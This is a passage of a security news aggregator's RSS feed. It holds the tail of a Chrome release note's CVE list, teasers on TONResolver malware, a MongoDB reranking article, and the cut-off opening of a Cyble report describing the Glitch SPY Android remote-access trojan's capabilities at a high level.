href="https://issues.chromium.org/issues/513264273"><span>513264273</span></a><span>] </span><span>Low </span><span>CVE-2026-14094: Use after free in Installer. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513271007"><span>513271007</span></a><span>] </span><span>Low </span><span>CVE-2026-14095: Insufficient validation of untrusted input in Browser. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513310821"><span>513310821</span></a><span>] </span><span>Low </span><span>CVE-2026-14096: Object lifecycle issue in Input. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513333529"><span>513333529</span></a><span>] </span><span>Low </span><span>CVE-2026-14097: Inappropriate implementation in WebAppInstalls. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513375767"><span>513375767</span></a><span>] </span><span>Low </span><span>CVE-2026-14098: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513382161"><span>513382161</span></a><span>] </span><span>Low </span><span>CVE-2026-14099: Use after free in Chrome for iOS. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513383891"><span>513383891</span></a><span>] </span><span>Low </span><span>CVE-2026-14100: Insufficient data validation in NetworkCache. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513454805"><span>513454805</span></a><span>] </span><span>Low </span><span>CVE-2026-14101: Insufficient policy enforcement in Sandbox. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513455047"><span>513455047</span></a><span>] </span><span>Low </span><span>CVE-2026-14102: Use after free in Passwords. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513465245"><span>513465245</span></a><span>] </span><span>Low </span><span>CVE-2026-14103: Use after free in SSL. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513484193"><span>513484193</span></a><span>] </span><span>Low </span><span>CVE-2026-14104: Insufficient validation of untrusted input in WebAppInstalls. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513528117"><span>513528117</span></a><span>] </span><span>Low </span><span>CVE-2026-14105: Insufficient policy enforcement in Speech. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513532778"><span>513532778</span></a><span>] </span><span>Low </span><span>CVE-2026-14106: Insufficient validation of untrusted input in Text. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513544566"><span>513544566</span></a><span>] </span><span>Low </span><span>CVE-2026-14107: Use after free in Scheduling. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513689974"><span>513689974</span></a><span>] </span><span>Low </span><span>CVE-2026-14108: Use after free in PDFium. </span><span>Reported by Google on 2026-05-15</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513694957"><span>513694957</span></a><span>] </span><span>Low </span><span>CVE-2026-14109: Insufficient policy enforcement in Mojo. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513698452"><span>513698452</span></a><span>] </span><span>Low </span><span>CVE-2026-14110: Inappropriate implementation in DarkMode. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513710926"><span>513710926</span></a><span>] </span><span>Low </span><span>CVE-2026-14111: Use after free in WebProtect. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513713946"><span>513713946</span></a><span>] </span><span>Low </span><span>CVE-2026-14112: Inappropriate implementation in Enterprise. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513737335"><span>513737335</span></a><span>] </span><span>Low </span><span>CVE-2026-14113: Use after free in Updater. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513743129"><span>513743129</span></a><span>] </span><span>Low </span><span>CVE-2026-14114: Inappropriate implementation in WebAppInstalls. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513745699"><span>513745699</span></a><span>] </span><span>Low </span><span>CVE-2026-14115: Insufficient validation of untrusted input in Cast. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513747800"><span>513747800</span></a><span>] </span><span>Low </span><span>CVE-2026-14116: Insufficient validation of untrusted input in DevTools. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513751020"><span>513751020</span></a><span>] </span><span>Low </span><span>CVE-2026-14117: Insufficient validation of untrusted input in DevTools. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513772764"><span>513772764</span></a><span>] </span><span>Low </span><span>CVE-2026-14118: Insufficient data validation in DevTools. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513775483"><span>513775483</span></a><span>] </span><span>Low </span><span>CVE-2026-14119: Type Confusion in Bluetooth. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513777411"><span>513777411</span></a><span>] </span><span>Low </span><span>CVE-2026-14120: Inappropriate implementation in DevTools. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513789382"><span>513789382</span></a><span>] </span><span>Low </span><span>CVE-2026-14121: Use after free in Chromoting. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513824891"><span>513824891</span></a><span>] </span><span>Low </span><span>CVE-2026-14122: Insufficient validation of untrusted input in WebAppInstalls. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513856644"><span>513856644</span></a><span>] </span><span>Low </span><span>CVE-2026-14123: Incorrect security UI in Chrome for iOS. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513867710"><span>513867710</span></a><span>] </span><span>Low </span><span>CVE-2026-14124: Inappropriate implementation in CredentialProvider. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513918431"><span>513918431</span></a><span>] </span><span>Low </span><span>CVE-2026-14125: Uninitialized Use in ANGLE. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513992796"><span>513992796</span></a><span>] </span><span>Low </span><span>CVE-2026-14126: Incorrect security UI in UI. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514009654"><span>514009654</span></a><span>] </span><span>Low </span><span>CVE-2026-14127: Inappropriate implementation in Printing. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514015836"><span>514015836</span></a><span>] </span><span>Low </span><span>CVE-2026-14128: Insufficient data validation in Chrome for iOS. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514018024"><span>514018024</span></a><span>] </span><span>Low </span><span>CVE-2026-14129: Incorrect security UI in PreviewTab. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514019522"><span>514019522</span></a><span>] </span><span>Low </span><span>CVE-2026-14130: Incorrect security UI in Omnibox. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514020982"><span>514020982</span></a><span>] </span><span>Low </span><span>CVE-2026-14131: Insufficient validation of untrusted input in WebAppInstalls. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514039492"><span>514039492</span></a><span>] </span><span>Low </span><span>CVE-2026-14132: Inappropriate implementation in WebXR. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514039947"><span>514039947</span></a><span>] </span><span>Low </span><span>CVE-2026-14133: Race in History Embeddings. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514055973"><span>514055973</span></a><span>] </span><span>Low </span><span>CVE-2026-14134: Inappropriate implementation in Autofill. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514058566"><span>514058566</span></a><span>] </span><span>Low </span><span>CVE-2026-14135: Insufficient validation of untrusted input in Network. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514068611"><span>514068611</span></a><span>] </span><span>Low </span><span>CVE-2026-14136: Incorrect security UI in Chrome for iOS. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514070067"><span>514070067</span></a><span>] </span><span>Low </span><span>CVE-2026-14137: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514071775"><span>514071775</span></a><span>] </span><span>Low </span><span>CVE-2026-14138: Inappropriate implementation in WebAppInstalls. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514072495"><span>514072495</span></a><span>] </span><span>Low </span><span>CVE-2026-14139: Inappropriate implementation in TabStrip. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514072607"><span>514072607</span></a><span>] </span><span>Low </span><span>CVE-2026-14140: Insufficient validation of untrusted input in Input. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514072867"><span>514072867</span></a><span>] </span><span>Low </span><span>CVE-2026-14141: Incorrect security UI in Document Picture-in-Picture. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514073460"><span>514073460</span></a><span>] </span><span>Low </span><span>CVE-2026-14142: Inappropriate implementation in Extensions. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514075028"><span>514075028</span></a><span>] </span><span>Low </span><span>CVE-2026-14143: Incorrect security UI in Passwords. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514079793"><span>514079793</span></a><span>] </span><span>Low </span><span>CVE-2026-14144: Incorrect security UI in Views. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514485825"><span>514485825</span></a><span>] </span><span>Low </span><span>CVE-2026-14145: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514550047"><span>514550047</span></a><span>] </span><span>Low </span><span>CVE-2026-14146: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514632767"><span>514632767</span></a><span>] </span><span>Low </span><span>CVE-2026-14147: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/515426873"><span>515426873</span></a><span>] </span><span>Low </span><span>CVE-2026-14148: Type Confusion in CSS. </span><span>Reported by Google on 2026-05-21</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/515427046"><span>515427046</span></a><span>] </span><span>Low </span><span>CVE-2026-14149: Use after free in Audio. </span><span>Reported by Google on 2026-05-21</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517376041"><span>517376041</span></a><span>] </span><span>Low </span><span>CVE-2026-14150: Insufficient validation of untrusted input in Speech. </span><span>Reported by Google on 2026-05-28</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517381770"><span>517381770</span></a><span>] </span><span>Low </span><span>CVE-2026-14151: Inappropriate implementation in AI. </span><span>Reported by Google on 2026-05-28</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517534944"><span>517534944</span></a><span>] </span><span>Low </span><span>CVE-2026-14152: Out of bounds write in ANGLE. </span><span>Reported by Google on 2026-05-28</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517684077"><span>517684077</span></a><span>] </span><span>Low </span><span>CVE-2026-14153: Inappropriate implementation in Glic. </span><span>Reported by Google on 2026-05-29</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517741170"><span>517741170</span></a><span>] </span><span>Low </span><span>CVE-2026-14154: Inappropriate implementation in DevTools. </span><span>Reported by Google on 2026-05-29</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/518246925"><span>518246925</span></a><span>] </span><span>Low </span><span>CVE-2026-14155: Insufficient policy enforcement in StorageAccessAPI. </span><span>Reported by Google on 2026-05-30</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/518247789"><span>518247789</span></a><span>] </span><span>Low </span><span>CVE-2026-14156: Policy bypass in StorageAccessAPI. </span><span>Reported by Google on 2026-05-30</span></div><div><span><br></span></div><div><span>We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.</span></div><p><span><br></span></p><p><span>Many of our security bugs are detected using </span><a href="https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer"><span>AddressSanitizer</span></a><span>, </span><a href="https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer"><span>MemorySanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer"><span>UndefinedBehaviorSanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/control-flow-integrity/"><span>Control Flow Integrity</span></a><span>, </span><a href="https://chromium.googlesource.com/chromium/src/+/HEAD/testing/libfuzzer/README.md"><span>libFuzzer</span></a><span>, or </span><a href="https://github.com/google/afl"><span>AFL</span></a><span>.</span></p><p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)"><span color="rgba(0, 0, 0, 0.87)"><span><br></span></span></span></span></p><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TONResolver Malware Uses TON Smart Contracts as Dead Drop Resolver for C2 Switching]]></title>
<description><![CDATA[A new wave of cyberattacks targeting Japan’s hospitality sector has put the global threat landscape on high alert. In late May 2026, attackers began sending phishing emails to Japanese partner companies of Booking.com, disguised as urgent guest complaints and review…
Read more →
The post TONResol...]]></description>
<link>https://tsecurity.de/de/3635552/it-security-nachrichten/tonresolver-malware-uses-ton-smart-contracts-as-dead-drop-resolver-for-c2-switching/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635552/it-security-nachrichten/tonresolver-malware-uses-ton-smart-contracts-as-dead-drop-resolver-for-c2-switching/</guid>
<pubDate>Tue, 30 Jun 2026 14:23:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new wave of cyberattacks targeting Japan’s hospitality sector has put the global threat landscape on high alert. In late May 2026, attackers began sending phishing emails to Japanese partner companies of Booking.com, disguised as urgent guest complaints and review…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/tonresolver-malware-uses-ton-smart-contracts-as-dead-drop-resolver-for-c2-switching/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/tonresolver-malware-uses-ton-smart-contracts-as-dead-drop-resolver-for-c2-switching/">TONResolver Malware Uses TON Smart Contracts as Dead Drop Resolver for C2 Switching</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MongoDB embeds reranking into Atlas as enterprises look to simplify AI stacks for scale]]></title>
<description><![CDATA[MongoDB has introduced a native reranking capability for Atlas, aiming to help enterprises improve AI retrieval quality without adding another service to their technology stack.



The move addresses a longstanding challenge with reranking technology. While it can significantly boost the relevanc...]]></description>
<link>https://tsecurity.de/de/3635369/ai-nachrichten/mongodb-embeds-reranking-into-atlas-as-enterprises-look-to-simplify-ai-stacks-for-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635369/ai-nachrichten/mongodb-embeds-reranking-into-atlas-as-enterprises-look-to-simplify-ai-stacks-for-scale/</guid>
<pubDate>Tue, 30 Jun 2026 13:18:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>MongoDB has introduced a native reranking capability for Atlas, aiming to help enterprises improve AI retrieval quality without adding another service to their technology stack.</p>



<p>The move addresses a longstanding challenge with reranking technology. While it can significantly boost the relevance of AI-generated responses, deploying it has typically required separate vendors, APIs, and orchestration layers that add complexity, governance overhead, and cost as AI applications scale.</p>



<p>The feature named <a href="https://www.mongodb.com/docs/vector-search/query/aggregation-stages/rerank/">Native Reranking</a>, currently in public preview and powered by <a href="https://www.infoworld.com/article/3831631/mongodb-acquires-voyage-ai-to-reduce-hallucinations-in-ai-applications.html">Voyage AI</a>, runs directly within the MongoDB aggregation pipeline and can improve retrieval quality by up to 30%, the company said in a statement.</p>



<h2 class="wp-block-heading">Native integration cuts developer overhead</h2>



<p>Embedding reranking directly into the database, according to analysts, will reduce operational toil for developers, resulting in productivity gains.</p>



<p>“Native Reranking reduces the work that developers usually do. The immediate impact is a little less code. However, the lasting gain is never building the retry logic, the failure handling, and the version juggling that a separate reranking service forces on you. That orchestration is invisible in a demo and a real tax once the app is live,” said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Mike Leone</a>, principal analyst at Moor Insights &amp; Strategy.</p>



<p>Similarly, <a href="https://www.linkedin.com/in/slwalter" target="_blank" rel="noreferrer noopener">Stephanie Walter</a>, practice leader for the AI stack at HyperFRAME Research, pointed out that the new feature will allow developers to spend less time wiring together infrastructure and more time improving application behavior.</p>



<p>That reduction in engineering overhead will also positively impact enterprise IT leaders, mostly CIOs, responsible for governing AI infrastructure.</p>



<p>“For CIOs, native reranking is valuable because it simplifies the AI stack. Every additional AI service creates another place to govern, secure, monitor, and pay for,” Walter said.</p>



<p>“While putting reranking closer to the data does not eliminate all architectural complexity, it reduces one of the handoffs where retrieval quality, data freshness, and operational control can break down,” Walter added.</p>



<p>The value for CIOs is more strategic, said <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, leader of executive research at HFS Research. “Most enterprises cite inaccuracy as their top AI risk as adoption scales,” Chaturvedi said. Better retrieval, he noted, is “infrastructure for earning that trust,” because enterprises are unlikely to hand greater decision-making authority to AI agents unless they can trust the quality of the information those systems retrieve and reason over.</p>



<h2 class="wp-block-heading">Reducing the cost of enterprise AI at scale</h2>



<p>Beyond simplifying development and operations, Native Reranking could also help CIOs reduce the operational costs of scaling AI, an area that remains a major enterprise challenge, analysts further pointed out.</p>



<p>Retrieval optimization, according to Walter, is emerging as one of the most practical levers for controlling AI spending because reducing irrelevant context lowers token consumption.</p>



<p>“The rationale is that every passage you send to the model is something it has to read and reason over on expensive GPU compute, and that cost scales with how much you feed it. Trimming irrelevant passages before they reach the model means you stop paying frontier-model rates to reason over context that was never going to matter,” echoed Chaturvedi.</p>



<p>“As enterprises adopt larger, pricier models, the cost of padded context compounds fast. And in the agentic era, the math gets worse, because bad retrieval doesn’t just produce one bad answer. Rather, it triggers a wrong step, a retry, and a fresh round of tokens across the whole trajectory,” Chaturvedi added.</p>



<h2 class="wp-block-heading">Potential trade-offs</h2>



<p>Despite all the benefits around productivity, integration, and cost, Native Reranking, analysts warned, comes with its own set of potential trade-offs.</p>



<p>The very simplification of the enterprise AI stack that Native Reranking offers today can become vendor lock-in later, said Leone, adding that it can increase the cost of switching platforms later.</p>



<p><a href="https://www.infotech.com/profiles/igor-ikonnikov" target="_blank" rel="noreferrer noopener">Igor Ikonnikov</a>, advisory fellow at Info-Tech Research Group, pointed to another limitation, noting that the value of native reranking depends on whether MongoDB serves as the organization’s primary data repository.</p>



<p>Enterprises with data spread across multiple repositories may still require cross-system orchestration or centralized retrieval optimization rather than relying solely on database-native capabilities, he added.</p>



<h2 class="wp-block-heading">CIOs should evaluate beyond model accuracy</h2>



<p>These trade-offs, analysts said, also underscore why CIOs should avoid evaluating retrieval technologies solely on retrieval accuracy.</p>



<p>Instead, Walter pointed out that CIOs should assess platforms based on their ability to balance retrieval accuracy with operational simplicity, governance, latency, and data freshness.</p>



<p>Similarly, Chaturvedi cautioned that CIOs should increasingly evaluate the total cost of ownership, including the engineering effort required to maintain retrieval quality, token consumption, and the number of operational failure points introduced by the architecture.</p>



<h2 class="wp-block-heading">Part of a broader shift toward integrated AI platforms</h2>



<p>The broader shift in how CIOs are likely to evaluate AI infrastructure offerings is also influencing how data warehouse and database vendors are evolving their platforms.</p>



<p>Over the past several months, <a href="https://www.infoworld.com/article/4188484/edb-converges-analytics-on-postgres-to-support-ai-agents.html">EnterpriseDB (EDB)</a>, <a href="https://www.infoworld.com/article/4190042/pgedge-joins-rush-to-merge-oltp-and-olap-storage-to-support-ai.html">pgEdge</a>, and <a href="https://www.infoworld.com/article/4185622/databricks-pitches-ltap-as-a-new-foundation-for-agentic-applications.html">Databricks</a> have all introduced new architectures designed to consolidate AI, transactional, and analytical capabilities into their respective data platforms, reducing data movement and the number of systems enterprises need to integrate and manage.</p>



<p>This shift, Leone said, is part of a broader industry correction after enterprises spent the first wave of generative AI deployments assembling multiple specialized services, creating operational complexity that frequently slowed production deployments.</p>



<p>Chaturvedi noted that enterprise AI is moving away from an “assembly-required” model toward integrated platforms that package core AI capabilities together as organizations seek to reduce the integration tax associated with multi-vendor AI stacks.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[TONResolver Malware Uses TON Smart Contracts as Dead Drop Resolver for C2 Switching]]></title>
<description><![CDATA[A new wave of cyberattacks targeting Japan’s hospitality sector has put the global threat landscape on high alert. In late May 2026, attackers began sending phishing emails to Japanese partner companies of Booking.com, disguised as urgent guest complaints and review requests. The goal was to tric...]]></description>
<link>https://tsecurity.de/de/3635330/it-security-nachrichten/tonresolver-malware-uses-ton-smart-contracts-as-dead-drop-resolver-for-c2-switching/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635330/it-security-nachrichten/tonresolver-malware-uses-ton-smart-contracts-as-dead-drop-resolver-for-c2-switching/</guid>
<pubDate>Tue, 30 Jun 2026 13:06:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new wave of cyberattacks targeting Japan’s hospitality sector has put the global threat landscape on high alert. In late May 2026, attackers began sending phishing emails to Japanese partner companies of Booking.com, disguised as urgent guest complaints and review requests. The goal was to trick hotel staff into opening malicious files that handed remote […]</p>
<p>The post <a href="https://cybersecuritynews.com/tonresolver-malware-uses-ton-smart-contracts/">TONResolver Malware Uses TON Smart Contracts as Dead Drop Resolver for C2 Switching</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App]]></title>
<description><![CDATA[Executive Summary




Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as Glitch SPY, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.


Based on the Polish-language lure a...]]></description>
<link>https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</guid>
<pubDate>Tue, 30 Jun 2026 12:08:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Glitch SPY" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg 1200w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-768x384.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App 1"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, targeting users in Poland or Polish expats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The downloaded application functions as a dropper and installs the Glitch SPY payload after convincing the user to allow installation from unknown sources. Glitch SPY prompts the victim to enable Android Accessibility Service, which it abuses to automate permission grants, interact with the device UI, extract visible screen content, perform gestures, support remote input, and enable further post-infection activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY maintains a persistent WebSocket channel to its C&amp;C server and supports over 70 commands spanning live screen streaming and remote control, screenshot and screen-reader capture, SMS, contact, call log, and location theft, camera and microphone surveillance, keylogging, file management, and shell execution.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Beyond standard surveillance, it includes a crypto-clipper that swaps copied wallet addresses across multiple blockchain formats, file encryption/decryption routines, device-unlock and credential-capture logic, and a hidden remote-browser capability that lets attackers conduct web-based account takeover from the victim's own device and IP.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder module lets operators set a custom app name, package ID, icon, and decoy URL per payload, indicating the platform is designed for redistribution across multiple campaigns, not a single targeted operation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121430,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-1-%E2%80%93-Glitch-SPY-Attack-Chain-1024x601.png" alt="Figure 1 – Glitch SPY Attack Chain" class="wp-image-121430"><figcaption class="wp-element-caption"><em>Figure 1 – Glitch SPY Attack Chain</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Glitch SPY is an emerging Android RAT/builder platform identified through branding observed on an exposed C&amp;C admin panel.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware is distributed via a fake Polish rental app website that encourages users to download and install an APK outside official app stores.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The downloaded application is the Brokewell Android Loader, which acts as a dropper and deploys the Glitch SPY payload.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY heavily abuses the Android Accessibility Service to auto-grant permissions, extract on-screen content, perform taps and gestures, and operate the device with minimal user interaction.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY supports extensive surveillance and theft capabilities, including screen streaming, screenshots, keylogging, SMS theft, contact and call log collection, file access, audio and camera capture, clipboard monitoring, location tracking, and remote browser control.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware includes a crypto-clipper that swaps copied wallet addresses across multiple formats (ETH/EVM, TRON, Bitcoin legacy, and Bech32) with attacker-controlled addresses, directly targeting cryptocurrency users.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
